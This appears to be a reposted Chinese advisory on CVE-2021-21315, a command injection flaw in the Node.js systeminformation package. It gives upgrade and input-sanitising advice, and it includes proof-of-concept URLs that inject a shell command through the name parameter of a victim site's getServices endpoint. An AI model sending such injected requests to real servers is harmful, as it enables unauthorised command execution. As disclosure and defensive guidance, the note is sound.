本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315)攻击者可以通过「systeminformation」中代码注入漏洞的存在意味着攻击者可以通过在组件使用的未初始化参数内小心翼翼地注入有效载荷来执行系统命令。
POC:
`[PoC]``[Victim Site]/api/getServices?name=$(echo -e 'Sekurak' > pwn.txt)``[Victim Site]/api/getServices?name[]=$(echo -e 'Sekurak' > pwn.txt)`
目前该漏洞已经修复,将systeminformation及时升级到5.3.1或更高版本。
https://www.npmjs.com/package/systeminformation
缓解措施
如果无法升级,可以检查或清理传递给si.inetLatency()、si.inetChecksite()、si.services()、si.processLoad()的参数,只允许使用string,拒绝任何数组。